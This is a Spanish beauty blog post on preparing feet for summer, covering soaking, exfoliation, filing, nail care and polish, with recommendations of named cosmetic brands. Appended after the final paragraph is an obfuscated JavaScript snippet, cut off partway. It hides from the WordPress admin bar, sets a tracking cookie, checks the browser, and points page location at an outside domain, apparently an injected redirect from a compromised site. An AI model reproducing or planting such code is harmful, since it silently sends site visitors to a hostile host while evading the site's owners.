¡Pies al aire! Sí, pero ¿están preparados? En el post de hoy vamos a hablar sobre cómo cuidar de nuestros pies en verano para que estén perfectos. En el artículo anterior lo hicimos sobre la llegada del verano, las pieles secas y cómo hidratarlas, por eso ahora le toca el turno a nuestros pies. Al contrario que con la piel del rostro que de forma casi automática huye del sol, nuestros pies desean todo lo contrario ¡y con razón! Después de casi nueve meses encerrados en calcetines, medias, botas, deportivas y zapatillas de andar por casa con borreguillo por dentro, llega el momento de prepararlos para recibir la luz del sol, llevar sandalias y ser también los protagonistas del verano. ¡Empezamos!

pies perfectos de una chica en la playa con una flor apoyada en el empeine

La hidratación, exfoliación y limado que tus pies necesitan en verano

Aunque estemos deseando lucir nuestros pies cuidados y perfectos durante todo el verano, es importante saber que durante esta época sufren mucho más que en invierno debido a la menor protección. Por lo tanto, lo primero que haremos será ver en qué estado se encuentran y en el caso de encontrar fuertes durezas, callos y otros problemas visitar a un o una especialista. Si por el contrario, no encontramos nada preocupante, utilizaremos a diario una crema ligera para el día (si es necesario) y, especialmente, una hidratante y nutritiva por la noche.

Los días previos a empezar a usar sandalias es aconsejable realizar un tratamiento de verano para nuestros pies. Para ello, los introduciremos en un barreño con agua caliente (sin pasarse) para ablandar las durezas — el uso de un poco de sal ayudará mucho a su limpieza y revitalización —. A continuación, aplicaremos una mascarilla que elimine todas las células muertas, a nosotras nos encanta la Crema Exfoliante Corporal Sparkle Skin de Clinique porque puedes utilizarla también en tus rodillas y codos, y viene muy bien para la descamación. Acto seguido pasaremos a limar las durezas con una herramienta específica como la lima de pedicura de Beter con carburo de silicio que, gracias a su forma ergonómica, facilita mucho el trabajo. Al terminar, y si no vas a seguir con el paso siguiente, aplicaremos un poco de crema hidratante.

Cuerpo, manos y pies de una chica con un bote de crema, flore y una vela a su alrededor

Cuidados para realzar la belleza de tus pies en verano.

Después de la rutina que acabamos de explicar tus pies estarán un poco más cerca de lucir como quieres, así que llega el momento de potenciar toda su belleza con nuestros consejos para unos pies más bonitos en verano. Si vamos a recortar las uñas, recordar hacerlo siempre en forma cuadrada para que no se nos claven al crecer. Las cutículas necesitan su atención personalizada y para lograr un cuidado con mejoras a largo plazo recomendamos el Sérum Nutritivo Diario Huile Abricot de DIOR, ¡sin lugar a dudas!

A la hora de pintarlas elegiremos colores vivos y alegres, ya sea un tono fluor para las más atrevidas o un color de fondo de armario para las que quieren que combine con todo. Eso sí, lo único importante es elegir uno de calidad. Nuestra mejor consejo es  apostar por una buena marca que proteja tus uñas a pesar del sol, el calor y el sudor al que van a ser expuestas sin perder intensidad o brillo en un plazo medio-largo. La gama de lacas de mejor nos funciona por su durabilidad y el brillo es LE VERNIS de CHANEL, no te arrepentirás.

Otros aspectos a tener en cuenta en verano y que suelen olvidarse con bastante frecuencia son el uso de protección solar diaria y mucho más los días de playa y piscina,  llevar una correcta alimentación que nos hidrate y beber mucha agua. Por ejemplo, para unas uñas más sanas en verano elegiremos aquellos alimentos que contengan vitamina C como el brócoli, vitamina b12 como el pescado azul, zinc del marisco o las vitaminas B y E que podemos encontrar en los frutos secos.

tres chicas tumbadas en una piscina con las piernas levantadas

El último consejo que os damos es que disfrutéis del verano sin olvidaros de escuchar las necesidades de vuestros cuerpos. Ahora os toca a vosotras, ¿conocéis algún secreto para que vuestros pies estés perfectos? ¡Contarnos! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone